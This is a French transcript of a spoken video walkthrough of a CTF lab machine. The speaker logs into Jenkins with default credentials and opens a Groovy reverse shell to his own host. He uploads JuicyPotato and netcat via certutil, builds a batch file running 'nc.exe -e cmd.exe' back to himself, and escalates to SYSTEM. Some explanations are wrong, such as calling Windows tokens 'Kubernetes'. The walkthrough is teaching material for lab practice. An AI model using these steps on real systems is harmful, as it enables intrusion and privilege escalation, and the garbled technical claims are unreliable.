Donc salut les gars, aujourd'hui j'ai décidé de refaire proprement le CDF. Le but ici c'est d'aller le plus lentement possible et le plus rapidement possible parce que j'ai pas envie que la vidéo fasse des heures. Après j'ai des problèmes à l'uploader parce que j'ai une petite bande passante et pas que. Donc aujourd'hui on va voir comment créer un compte sur CyberSec Labs. Donc là à vous de vous enregistrer sur le site. Ça, vous devriez pas avoir besoin de moi. Et on va commencer à faire les CTF, histoire que vous compreniez un petit peu ce qu'on fait et que je vous donne des explications que j'espère claires. Voilà, donc on va faire la machine Pototo. Donc c'est une attaque qui s'appelle Juicy Pototo. Donc Juicy Potato, essentiellement, c'est une version militarisée d'un exploit qui existait déjà, qui s'appelait Rotten Potato, qui exploite la façon dont Microsoft gère les jetons. On appelle ça Kubernetes. C'est une technologie de jetons. Donc si vous avez un jeton, vous êtes authentifié auprès de l'Active Directory. Donc l'Active Directory, pour rappel, c'est une composante des Windows Server qui permet d'administrer des machines dans un environnement d'entreprise. Grâce à cela, donc, nous obtenons une élévation de privilège. Donc, comment ça marche? En gros, je vais essayer de simplifier au maximum, mais il y a ce qu'on appelle un CLSID, qui est un identificateur global unique, qui identifie un objet de la classe COM. L'exploit nous permet de passer des comptes de service de la session 0 à système. C'est donc bien une élévation de privilège. Donc cette attaque peut permettre d'attaquer un réseau d'entreprises via l'Active Directory de Microsoft, là, on va s'attaquer à une machine de rappel mémoire, je crois, de mémoire, pardon. C'est un Windows Server de 2012, quelque chose comme ça. Mais pas important, le système d'exploitation n'a pas d'importance. Donc on va voir qu'on a besoin d'un shell avec un compte de service. Donc la seule exigence réelle, on va rechercher un compte qui possède le Assign Primary Token Privilege et l'Impersonate Privilege, ce que la plupart des comptes de service ont. Et puis, on va essayer donc d'affecter un CLSID qui va nous permettre de faire l'escalade de privilèges. Donc, de nombreux CLSID appartiennent au login user. Donc, vous sélectionnez cette option et en tant qu'administrateur de domaine connecté, vous pouvez fondamentalement passer directement à l'AD qui contrôle donc l'Active Directory. Ça permet donc d'avoir un utilisateur en tant que local qui n'a pas de privilège particulier et de passer administrateur de l'AD. Donc on va voir comment on effectue cette attaque et on va se connecter d'abord à la machine. Donc là déjà, je vais la stopper. Ok, donc il veut pas me l'arrêter. Donc on va repartir. La machine est démarrée. Vous, ce qu'il vous faut faire, c'est Getting Start. Vous allez télécharger, bien sûr, la connexion OpenVPN. Donc c'est une sorte de script qui va se lancer sur votre machine. Donc on va voir un petit peu comment ça se passe. Donc voilà, il n'y a qu'un serveur. Vous faites download. Ça télécharge un fichier que j'ai déjà. Ensuite, on va aller dans nos téléchargements. Et là, on voit qu'il y a un truc qui s'appelle Saltimbanque OpenVPN. Donc, on va faire un sudo chmod plus X pour pouvoir l'exécuter. Voilà. Et maintenant, je vais faire un sudo OpenVPN avec le nom du script OpenVPN. Saltimbanque, vous, ça dépendra de votre compte, hein. Si vous enregistrez sur le site avec, je sais pas, Marcel, ça sera sudo OpenVPN marcel.openvpn. Donc on lance, on attend une dizaine de secondes et on voit à la fin tout en bas là qu'il y a Initialization Sequence Completed. Donc là, ça veut dire qu'on est authentifié. On ferme cette fenêtre, enfin on la réduit, la fermez pas, sinon c'est mort. Vous allez perdre la connexion VPN. Et on va vérifier via un ifconfig qu'on a bien une nouvelle connexion qui vient de se créer. Tune 0. Tune pour tunnel. Tunneling. Donc bien le VPN. On voit en effet que j'ai une nouvelle adresse. Donc c'est pas celle-ci, qui est mon réseau local, c'est bien l'adresse du VPN. Et l'adresse VPN, maintenant sur le réseau, moi c'est 10.10.0147. Maintenant, on va aller voir, on retourne choper l'adresse. Donc,
On connaît l'adresse. Donc on voit bien que c'est 172.31.1.19. Donc le premier truc qu'on va faire, c'est pinger la machine sur le réseau. Et on voit en effet que on arrive à pinger la machine sans trop de soucis. C'est bon signe, ça commence bien. Alors, premier truc, quand on fait un test d'intrusion sur une machine, c'est ce qu'on appelle la reconnaissance, l'énumération. Donc on va énumérer les services qui tournent sur la machine et on va faire de la reconnaissance avec Nmap, que je vous conseille, qui est plutôt simple à utiliser, qui va nous donner les ports ouverts sur la machine. Donc vous pouvez faire un sudo nmap-a pour tous les ports avec le nom de la machine, mais comme il va tester tous les ports, ça risque de prendre parfois une demi-heure. Donc ce que je vous conseille, c'est faire un nmap simple. Nmap, l'adresse de la machine que vous voulez. Ok, donc qu'est-ce qu'on voit? On voit que sur cette machine, on a différents services qui sont en état ouvert avec les ports TCP correspondants. Nous, on voit en effet que là, il y a visiblement un serveur web qui tourne sur le port 3389 et un proxy HTTP. Donc on va essayer de se connecter au proxy HTTP. On voit que c'est le port 8080. Donc, on rentre notre adresse. Merde. Comme ça. 172. Donc là, je l'ai déjà rentré. 31, 1, 19, 80, 80. Ok, on arrive sur une mire de connexion et on voit qu'il y a un Jenkins, un serveur Jenkins. Donc Jenkins, on va synthétiser au maximum. Ça permet de faire des montées de version. Ça permet aux développeurs de développer du code, de le partager entre eux et de faire tourner un serveur applicatif qui va permettre de modifier une application en temps réel, de faire des corrections, d'ajouter des mises à jour, ainsi de suite. Donc, le plus simple, là, je sais pas comment me connecter. Je pourrais faire un brute force, lancer une attaque de brute force pour trouver le mot de passe. Mais le plus simple, c'est taper Jenkins, default credential. Donc, mot de passe par défaut. Là, qu'est-ce qu'il nous dit? Il nous dit que par défaut, quand l'administrateur n'y touche pas, on utilise admin password. Malheureusement, on voit qu'on n'accède pas à la machine. Donc on va réessayer et là utiliser, il y a le réflexe tout le temps d'utiliser des mots de passe très basiques et les gens des fois, et ben là on va essayer admin admin et on voit que tout bêtement admin admin ça nous permet de nous connecter. Donc là on voit qu'on est connecté en tant que Ben et apparemment Ben est bien administrateur de la machine Jenkins. Donc maintenant en fait on va utiliser le compte de Ben et ça va être le serveur Jenkins, ça va être notre point d'entrée en fait pour se connecter à la machine. Donc qu'est-ce qu'on peut voir? On voit qu'on peut configurer la machine, on va voir un petit peu ce qui se passe. Donc là on peut changer les clés, pour l'instant ça nous sert pas trop. On va voir les builds. Donc ça on voit que Ben, on va essayer de manager, voilà. Donc là on est sur la page d'administration. Donc là pour vous aider on voit que c'est du Jenkins 2.73.3 et qu'il y a un paquet de failles apparemment qui sont concernées. Donc là, je vais résumer au plus simple, mais il y a une des failles qui nous permet en fait d'exploiter, de faire un exploit via la console Jenkins. Donc Jenkins, on voit ici qu'on a la script console, donc qui permet d'exécuter du code arbitraire à des fins d'administration, de diagnostic ou pour régler les problèmes. On va utiliser justement la console de script et on nous dit qu'on peut exécuter du code arbitraire sous forme de Groovy Script. Donc c'est un des modes qui est utilisé, le Groovy Script, pour administrer une console Jenkins. Donc
On va prendre le Groovy Script et on va voir s'il n'y a pas un exploit. On va voir si on peut pas faire, par exemple, donc pensez, hein, toujours quand vous faites un test d'intrusion, il faut savoir utiliser Internet, hein. Vous n'aurez pas toutes les infos dans votre tête, c'est impossible de retenir toutes les commandes. Donc c'est à vous de chercher. Google est votre meilleur ami. Et on voit que là, qui nous dit par exemple qu'il y a moyen d'exécuter de différentes façons du Groovy Script pour avoir un shell. Donc on va voir. Moi je vais taper shell exploit. Donc on voit qu'on peut utiliser Metasploit pour faire un payload, une charge. Mais c'est pas ça qui m'intéresse. Moi je veux un river shell. Voilà. Et on voit en Java, on va trouver du code JavaScript qui va nous permettre d'exécuter ce qu'on veut. Donc on va prendre ce script qui est sur GitHub, qui est voilà, Frohoff a posté ça donc il y a 5 ans, et on va récupérer l'ensemble du script Java. Donc pour toutes ces commandes, je vous conseille d'apprendre le JavaScript pour comprendre quelles sont ses fonctions. Là on voit que c'est du for liner, donc on voit que la commande c'est du séquentiel. Donc on va d'abord exécuter ça. Ensuite, on va initialiser le port réseau. On va faire une usurpation du cmd.exe, donc la ligne de commande. Et on va faire une injection de code dans la 4e ligne via un process. Donc je copie ça et je retourne sur ma machine Jenkins et je colle. Hop, voilà, je colle ça. Et maintenant, on va faire deux modifications. Déjà, on va choisir le port par défaut. Donc moi, je vais prendre par exemple 4444 et on va remplacer le localhost par l'adresse IP de notre machine. Donc tout à l'heure, je vous ai dit quoi? Qu'il fallait qu'on prenne l'adresse IP du tunneling. Donc on fait un petit if config. Et là, on voit que nous, c'est du 10.10.0.147. Donc on met notre adresse IP 10.10.0.147. Donc là, on peut exécuter le script. Mais il va rien se passer. Pourquoi? Parce qu'il faut qu'on ouvre un listener. Donc un listener, c'est un programme qui va écouter toutes les conversations réseau sur un port précis. Pour ça, on va utiliser un outil qui s'appelle netcat. Donc on va faire un sudo nc netcat. On va faire la commande en argument, on va faire lnvp et on va spécifier le port. Nous, ça sera 4, 4, 4, 4. Ok. Qu'est-ce qu'il nous dit? Il nous dit que maintenant il écoute toutes les communications sur le port 4444 TCP. On retourne, on voit bien qu'on a spécifié en init port, initial port, le 44444. J'exécute le script. J'attends un peu, vous voyez que ça mouline en haut. Et je reviens sur ma commande. Voilà. Donc on voit bien que là, on a fait via l'injection de code malicieux JavaScript, ça nous permet d'avoir la main sur le Windows Server. Bon, actuellement, on va voir qui je suis. Voilà, j'ai bien le compte de Ben. Le problème, c'est que le compte de Ben, par rapport à l'Active Directory, lui, c'est un compte local utilisateur. Il a certains privilèges, mais il n'est pas administrateur. Donc, il n'a pas les pleins pouvoirs, il n'est pas root. Nous, ce qu'on va chercher à faire via l'attaque donc de la patate juteuse, Juicy Potato, c'est une élévation de privilèges. On va passer de ce compte Ben au compte NT System. NT System, pour rappel, sur une machine Windows, c'est le compte administrateur avec l'ensemble des droits. C'est le dieu dans la machine. Donc on va faire cette petite attaque. On va voir comment on peut faire. Donc, on va rentrer une commande qui s'appelle wami, pardon, avec priv pour lister l'ensemble des privilèges. Et pour pouvoir faire l'attaque de la patate juteuse, il faut surtout, vous voyez que là, on a impersonate a client after authentication. Donc on voit que c'est actif.
On voit qu'on a également create global object qui est enable et le change notifying privilege. Donc ça, c'est exactement ce qu'il nous faut pour pouvoir faire une escalade de privilèges via cette attaque. Donc, on va choper le script qui va nous permettre de faire ça. Donc, moi je sais que c'est Juicy Potato. Après, bien sûr, il faudra faire quelques recherches Google. Et on en voit qu'on a Opi, donc qui est un gars qui a créé donc cette attaque qui permet de faire une escalade de privilèges, une élévation de privilèges. Donc on voit que il va falloir qu'on renseigne plusieurs choses et qu'on utilise donc cet outil pour pouvoir modifier le token et ça va nous adresser un token utilisateur. On va faire un create process with token et en fait l'Active Directory va croire à partir de notre compte lambda, notre compte utilisateur, que nous sommes administrateurs. Et à partir de là, on aura tous les droits sur la machine, on pourra se balader dans tous les répertoires, on pourra faire toutes les modifications qu'on veut. Donc on va venir récupérer le script. Là, quand vous savez pas, hein, très souvent ça vous donne du code. Là, nous, on veut pas le code, on veut le code compilé. Donc ça sera dans Release. Vous allez ici, il vous dit que la dernière version date d'août 2018. Nous, on veut l'exé. Donc on va choper l'exé. Alors il y a deux façons, soit vous le chopez comme ça, mais c'est pas intéressant. Je vous conseille de faire cancel. Vous faites choisir, copier le lien, l'adresse du lien, et on va venir travailler dans notre répertoire. On ouvre un autre terminal. Et là, par exemple, je vais faire un PWD. Je sais que je travaille dans Home Saltimbanque. Ok. Donc, moi, à partir de ce répertoire-là, je vais télécharger tous les outils qui vont me permettre de manipuler et de hacker le serveur. Donc là, on va faire un vget pour télécharger le fichier GitHub qui nous intéresse. Voilà. Donc, je l'avais déjà fait. On voit que j'ai bien Juicy Potato, j'en ai même deux. Donc voilà, je vais supprimer les autres parce qu'ils me servent à rien. Mais vous, vous aurez un juicypotato.exe. Les deux autres là, c'est moi parce que avant de vous faire la vidéo, bien sûr, j'ai testé par moi-même. Ok, parfait. Donc là, on voit que j'ai bien téléchargé en local sur ma machine le Juicy Potato. Donc là, il est fonctionnel. On va lui donner les droits quand même pour qu'il puisse s'exécuter. Donc là, je vous conseille de faire un chmod 7777 pour avoir les droits en lecture, écriture, en exécution pour l'administrateur, vous, pour le compte local, moi c'est Saltimbanque, et pour un utilisateur lambda. Donc on voit qu'il est en local, donc on va donner le dernier 7. Ça sera pour qu'il s'exécute sans aucun problème. Ce que je vous conseille de faire, vous n'êtes pas obligé, mais c'est une sécurité. Pour être sûr que quand on va le téléverser vers le serveur Windows pour le hacker, le fichier aura pas des problèmes de droit, de lecture, d'exécution, et que Windows ne vous prenne pas la tête. Donc on va faire ça, on va mettre le nom du fichier qui nous intéresse. En l'occurrence ici, c'est le Juicy Potato. Voilà. Et là, quand je vais là, on va chercher le fichier et on voit bien que tous les utilisateurs ont les droits. Administrateur, donc read, write, execute. Compte local Saltimbanque, read, write, execute. Personne lambda, read, write, execute. Parfait. Donc maintenant, il va falloir trouver une solution pour uploader le fichier. Parce que là, j'ai accès bien sûr à la machine. Mais comment je vais pouvoir utiliser quelle commande je vais pouvoir utiliser pour pouvoir justement uploader maintenant notre Juicy Potato sur la machine. Donc déjà on va faire un cd point pour rester dans le répertoire de Bern.
Donc maintenant, on va travailler dans le répertoire de Ben. On voit qu'on a ses contacts, on a son dossier bureau, documents, téléchargements, favoris, les liens, la musique, les images, ses jeux sauvegardés, ses sauvegardes de jeux, ses recherches et ses vidéos. Donc là, si vous connaissez un petit peu Windows, c'est comme chez vous. Eh ben, honnêtement, vous êtes dans le répertoire utilisateur classique, comme sur votre ordinateur Windows. Donc nous, ce qu'on va faire en fait, on va ouvrir, donc là, on va ouvrir plein de commandes, enfin plein de shells. On va, grâce à Python 3, on va héberger rapidement un serveur HTTP. Pour ce, vous faites Python, surtout le sudo, Python 3 HTTP serveur, comme son nom l'indique, et on spécifie le port. Là, par exemple, on va pas se casser la tête, je vais prendre un port, allez, 999. Merde, excusez-moi. Pourquoi il veut pas? Ça commence bien. Sudo Python HTTP serveur. Ken, t'as pas une file? Ah oui, pardon, j'ai oublié. Python 3 -m. Voilà. Si vous mettez pas en argument le -m, ça risque pas de marcher. Donc là, qu'est-ce que nous dit Python? Qu'il a bien hébergé sur le port 0000, donc qui est en fait le loopback, c'est-à-dire ça tourne sur votre machine localement, et c'est bien le port TCP 9999. Donc maintenant, ce qu'on va faire, on revient sur notre console, sur notre connexion Netcat, et là, on va récupérer en fait le fichier qui est hébergé sur notre serveur Python, et on va voir un petit peu comment on fait ça. Donc là, il y a un utilitaire qui s'appelle certutile, qui vous permet à la fois de récupérer des fichiers, pardon, cert. Voilà. Donc certutile, ça vous permet à la fois de récupérer des fichiers, comme je vous le disais, et ça permet de signer numériquement des fichiers, des documents, des exés. Donc là, ça va avoir une double utilisation. Non seulement avec certutile, on va pouvoir récupérer le fichier et télécharger à partir de l'ordinateur du hacker vers le serveur Windows qu'on veut hacker le Juicy Potato Exe qui va nous permettre de faire l'élévation de privilèges. Et en plus, ça va le signer numériquement. Donc ça va permettre d'outrepasser, de contourner en fait les systèmes de protection sur le serveur Windows. Comme il sera signé numériquement par un outil qui est connu du Windows Server, puisque c'est un utilitaire Windows, en gros, ça va faciliter l'exécution de l'exé, et Windows va se dire, ah bah il a été signé numériquement, et en plus c'est une signature Windows. Dans ce cas-là, je vais pouvoir l'exécuter, il n'y a aucun risque. Ça permet, entre guillemets, de berner les systèmes de protection. Donc on va rentrer la commande qui est celle-ci. Donc, certes, pardon, excusez-moi, je fatigue, certes, utile. Ensuite, on va mettre le paramètre Earl Cache. On va faire le "-f", et là, on va lui donner l'adresse de notre serveur. Donc nous, on est en HTTP, vous ne faites pas l'erreur, c'est pas du HTTPS, et je vais rentrer forcément la machine, mon adresse IP. On a vu tout à l'heure que c'était 00147. Vérifiez bien la vôtre, bien sûr, elle sera différente. On n'oublie pas avec les deux points de spécifier le port TCP. On a vu tout à l'heure qu'on ouvrait le serveur d'écoute sur le 9999. Donc on va faire la même chose, on va bien le rentrer sur le port 9999. Ok, parfait. Voilà, je fais des bêtises. 9999, c'est bien ça. Ensuite, c'est à la racine. Donc là, on est à la racine de mon home saltimbanque. Donc j'ai pas besoin de rentrer d'autres URI. C'est à la racine, on tape directement le nom du fichier. On a vu qu'il s'appelait
juicy potato.exe. On n'oublie pas de fermer les guillemets. Donc là, on utilise certutile, on lui demande de récupérer cette URL qui est hébergée sur ce serveur, et maintenant on va donner un nom au fichier. On va l'appeler par exemple potato.exe. Voilà, ça va prendre un peu de temps. Donc là, mon Debian, le Kali Linux, va envoyer le fichier sur la machine, sur le serveur Windows. Et là, si on fait un dir, voilà, on voit bien qu'on a notre potato exe qui vient d'apparaître. Parfait. Maintenant, on va continuer l'attaque. Alors, qu'est-ce qu'on peut faire? Qu'est-ce qu'on peut faire? Maintenant, on a bien la main, on est avec le compte utilisateur, il va falloir qu'on fasse notre escalade de privilèges. Donc on va aller chercher quelques informations et je vais également récupérer un fichier WinPiece pour vous montrer. Donc on va sur ma machine et WinPiece, j'avais fait une vidéo dessus, c'est très utile quand vous faites des tests d'intrusion parce que concrètement, ça a un script qui va lister toutes les vulnérabilités sur la machine. Donc c'est pareil, on va se le choper tranquillement. Voilà, on voit que c'est un fichier BAT ou un fichier exe. Et donc ça va permettre de vérifier toutes les escalades de privilèges, toutes les élévations de privilèges, pardon, en bon français, qui sont possibles. Donc on va récupérer le script. Alors, qu'est-ce qu'il nous faut, nous? On va prendre un BAT. On va pas se casser la tête, mais on va voir s'il est pas compilé là. Je comprends pas trop pourquoi c'est pas compilé. Euh... Ça c'est le merge branch. Voilà, le fichier BAT. Ok. Ok, on a là. Donc on va voir si on peut faire un edit sur la machine. Je sais pas si ça marche. Non, l'edit il est pas reconnu. Donc c'est pas grave. Je récupère tout ça. Donc vous voyez le script est plutôt long, mais c'est très utile. Voilà. Là je fais mon copier. Je vais ouvrir encore un shell. Voilà. Et là je vais faire un sudo nano pour éditer le fichier que je veux et je vais l'appeler win.bat. Ok, je copie mon script, je fais un copier-coller, CTRL O pour sauvegarder, X. Maintenant, je reviens sur mon netcat, voilà. Alors, cet enfoiré il veut pas copier la commande, donc je la rends certes utile. Alors, cache f http 2.10.10.0 147 par 9999 WinBat. Je lui demande de sauvegarder. C'est parti. Donc j'ai bien mon WinBat. Je l'exécute. Voilà. Donc là, il va lister toutes les élévations de privilèges, différentes attaques. On va voir s'il y a des mots de passe qui sont en clair. Ça va lister tout ça. Donc on va le laisser s'exécuter tranquillement.
Ça peut prendre plusieurs minutes, ça dépend de la vitesse de la machine. Généralement, ça prend une trentaine de secondes. Mais à chaque fois que vous avez la main sur une machine, essayez d'uploader WinPeas parce qu'il va vous donner beaucoup de renseignements très utiles qui vous permettront après de d'usurper et de faire une élévation de privilège. Qu'on voit qu'il y a des variables qui peuvent être usurpées via d'autres attaques. On voit que apparemment il y a du Java qui est installé, donc ça peut être intéressant. Apparemment, on peut modifier aussi les services via l'éditeur de registre Windows. Et vous voyez, à chaque fois, il vous donne le lien avec l'article concerné et l'explication comment faire le hack. Donc WinPeas est vraiment très bien et ça vous redirige vers Actrix, qui est un des franchement des hackers que je vous conseille de suivre. Vous allez sur ce site et vous avez ce qu'on appelle une spreadsheet, c'est-à-dire toutes les attaques possibles sur une machine Windows. C'est une sorte de pense-bête. Et quand vous avez des doutes, quand vous vous rappelez plus des commandes, ou vous voulez une explication pour essayer de comprendre comment on peut exploiter telle ou telle faille, c'est vraiment utile. Donc on voit qu'il y a des binaires aussi qui ont des permissions qu'on peut peut-être usurper pour faire une élévation de privilège. On voit en effet que le Jenkins qu'on a utilisé, visiblement, il présente des failles et il tourne avec les droits authority. Donc c'est ce qu'on va faire. On va utiliser notre attaque de la patate juteuse pour exploiter les droits de Jenkins et s'accorder les droits NT Authority System. Donc là, on va pas s'emmerder. On va couper le script parce qu'apparemment ça mouline. Ah merde. Il faut que je relance. Donc là, j'ai perdu la connexion parce que j'ai bêtement fait CTRL-C. Donc je reviens. Je réexécute le script. Et du coup, je reprends la main. Voilà, je sais plus où c'est. Ça va être trop long. En principe, ça devrait reprendre la main. Là, je la récupère pas. Pourquoi? C'est une bonne question. Donc, je relance mon AT4 avec le port 4444. Ok, il écoute. Je repars sur ma console GenSkills. Je relance le payload parce que j'ai perdu ma connexion. Alors là, je trouve ça bizarre. On n'arrive plus à avoir la connexion. Je sais pas pourquoi il veut pas. On va faire un exit. On va relancer. LS. Ok, PWD, je suis bien dans le répertoire que je veux. Je fais mon sudo nc lvnp. Je spécifie le port 444 en TCP. Ok, je relance. Voilà, il me redonne la main. Donc si vous perdez la main, vous faites comme moi bêtement un CTRL-C ou un CTRL-Z. Voilà la technique pour retourner sur le serveur. Donc on fait un petit cd point pour revenir dans le répertoire où on était. On fait un dir pour lister tout. Et on a bien notre pototo. Maintenant on va voir comment lancer l'attaque pototo.exe.
Donc comme je vous ai dit tout à l'heure, chaque machine en fait Windows familial, en fonction des versions professionnelles, Windows Server a un CLSID. Donc c'est un identificateur et il va falloir qu'on récupère ce fameux CLSID. Donc là, on va retourner sur Fresh Potatoes, Juicy Potatoes et là qu'est-ce qu'il nous dit? Il va falloir spécifier donc via une commande le CLSID. Donc on voit, en effet, on lance l'exé, on spécifie un port, on demande d'exécuter l'application cmd.exe avec tous les droits en spécifiant le CLSID. En effet, c'est l'argument C. Donc maintenant, nous, il va falloir nous trouver le bon SLICD. Et on va là-dessus. Et maintenant, on voit qu'en effet, en fonction des machines, eh ben, c'est un Windows CL SID qui est différent. Donc, on retourne sur notre machine. Et là, on va faire un système info. Voilà. Donc, on voit tous les KB, toutes les mises à jour installées sur la machine. On voit que c'est un Windows Server 2012. Ok. On a l'info. On retourne là-dessus. Et nous, on veut un Windows Server 2012 Data Center. C'est exactement ça. Voilà. Donc là, on voit qu'on va faire une escalade de privilèges avec différents services. Tout ça, c'est des services Windows. On va en choisir un. On va prendre par exemple le serveur Windows Update et on va se servir des droits du Windows Server Update. Donc il y a un service qui permet de faire les mises à jour naturellement sur Windows. Et comme il fait les mises à jour sur Windows, forcément, il a les droits NT Authority. Donc la dernière fois, j'avais essayé ce CLSID et malheureusement, ça marche pas. Donc cette fois-ci, on va prendre celui-là. On le copie et maintenant, on va tranquillement se rentrer la petite commande et voir un petit peu ce qu'on peut faire. Donc je reviens sur ma machine. Voilà. Alors, on va créer une sorte de fichier BAT en fait qui va nous permettre de s'exécuter. Donc pour ce faire, on va modifier en fait une sorte de script et on va dire au script tu vas exécuter Juicy Potato et activer en même temps la ligne de commande. Mais pour ce faire, il nous faut absolument Netcat parce que Netcat va nous permettre en fait d'ouvrir un reverse shell sur la machine et de faire en même temps l'escalade de privilèges. Donc on va le récupérer. C'est un Windows Server, forcément c'est un 64 bits. Donc on va récupérer Netcat. Donc là on va se choper Netcat 64 bits. On va se le télécharger tranquillement. Voilà, je copie le lien. Je retourne sur, je sais pas, Bash. On va voir. Est-ce qu'il y en a un qui n'est pas utilisé? Ouais, là par exemple. Donc je fais mon wget comme d'habitude pour récupérer et télécharger le fichier. Voilà, ça me télécharge le fichier tranquillement. Donc maintenant, il faut que je l'upload sur la machine. Donc je refais mon cert utile. Toujours la même commande, rcache.f http 10 10 0 147 99 ncs 64.exe. Je ferme ma petite parenthèse et je lui donne le nom de nc.exe.
Alors, une erreur, ça faisait longtemps. Qu'est-ce que j'ai fait comme bêtise? Ah, je suis trop con. Ici, j'ai oublié le double bar. Ok, là, ça s'est bien déroulé. On est bien. Donc, on va faire un petit dire. On voit qu'on a bien notre fichier NC Netcat. Alors, maintenant, on va se faire un petit script de famille qui va nous permettre d'utiliser Netcat en fait et de lancer une sorte d'attaque pototo entre guillemets et de pouvoir faire cette fameuse escalade de privilèges. Donc, on va taper directement la commande. On va se faire un petit echo c2 user puisqu'on est dans user, on est dans ben, on veut netcat.exe, le paramètre e parce qu'on veut invoquer cmd.exe, je rentre ma machine. Là, cette fois-ci, je vais spécifier un port différent qu'on n'a pas utilisé. On va prendre 1111 et je lui donne un nom. Donc là, hop, ça c'est la sortie, le std output, et on va lui donner le nom escalade.bat. Donc je fais un petit type escalade.bat et là on voit qu'on a bien notre commande c user ben ncexe e cmd.exe, le nom de la machine, la mienne 10.0.0.0.147 et le port 1111. Donc maintenant on va ouvrir une nouvelle fenêtre avec une connexion Netcat forcément sur le port 1111 avec un listener. Bon, oh, il m'emmerde. Donc on va faire un sudo nc. Comme d'habitude, en argument LNVP, on veut le port, on a dit 1111. Ok, donc on écoute sur le 1111. Maintenant, on revient sur notre machine. Et je vais faire donc notre potato.exe.t. Je veux tout. Je veux le port 6686, celui qu'on a spécifié au tout début. Je vais prendre l'argument P. Je veux que ça soit c2.user.ben parce qu'on est dans le répertoire de ben et qu'on exécute escalade.bat qu'on vient de créer. Maintenant, on va spécifier le CCL SID. Donc, on revient récupérer l'information qu'on avait vue tout à l'heure. Et là, je vais faire mon copier et je vais le mettre en argument. Donc, c'est le bon. Ouais, je crois que c'est le bon. Ok.
Je regarde que c'est bien le C parce que j'ai des doutes. C'est bien ça, donc on rentre la commande et le C. Ok. Ah bâtard, il me l'a pas prise. Donc on recommence. Il veut bien me l'exécuter hein, sur le 1011 qu'il attend. On lance. Voilà. Et là, qu'est-ce qu'on voit? Où am I? Parfait. On est NT Authority System. Ça veut dire qu'on peut revenir sur le C. On voit qu'ici, c'est exactement pareil. On peut faire point point. On peut faire un dir. Pardon. Et on voit qu'on est administrateur. CD administrateur. Et on va récupérer le flag. Access is denied. Ok. Donc, pardon. C'est à partir de là qu'il faut le faire. CD users. CD administrateur. Administrateur. Ouais, au bout d'une heure, je commence à fatiguer. Veuillez m'excuser. On fait un dir. On voit qu'on a accès de mémoire. On va sur le desktop. On veut accéder au bureau. Voilà. Je l'ouvre en plein écran. Là, on fait un dir. À nouveau. On voit qu'il y a un système texte. On fait un type system.txt. C'est un fichier texte. Et là, on a le flag que vous allez rentrer. Voilà. Et là, vous avez la réponse du capture de flag. C'est ça. La donnée qui est codée en base 64. Vous la rentrez sur votre site, sur votre compte. Vous retournez sur Cyberlag. Voilà. Et là, vous mettez submit hash. Vous le submettez. Voilà. Et vous avez terminé. Donc moi, je l'ai déjà soumis. Donc à mon avis, voilà. Voilà, je l'ai déjà soumis. Mais là, une fois que vous avez ça, vous revenez sur votre gueule. Donc moi, je viens de commencer le Cybersex Lab. Donc bah, pour l'instant, j'en ai fait qu'un comme vous. Voilà. Et après, bah, il faudra faire tous les autres. Je vais m'y atteler. Voilà, j'espère que ça vous aura plu, que vous avez kiffé, que vous avez compris un petit peu comment ça se passe. Donc on passe par une phase d'énumération, scan de port, ensuite exploit pour accéder à la machine via un reverse shell en passant par Jenkins. Une fois qu'on est sur la machine, on va utiliser Netcat et CR utile pour s'envoyer des fichiers à partir de la machine du pirate vers le serveur. On va utiliser potato.exe qui est le Juicy Potato, l'attaque Juicy Potato. On va créer un script et invoquer la ligne de commande en se servant du potato.exe. Et ensuite, on va ouvrir avec Netcat sur notre machine différents ports qui vont nous permettre d'échanger les fichiers et d'avoir un listener pour pouvoir récupérer le reverse shell TCP, comme là à la fin, qui va faire l'élévation de privilèges. Et on voit bien que dans la dernière fenêtre shell qu'on ouvre sur le port 1111, pardon, on accède au poste d'administrateur, on a accès à l'arborescence et on récupère le flag. Voilà, kiffez bien, à bientôt. Ciao ciao.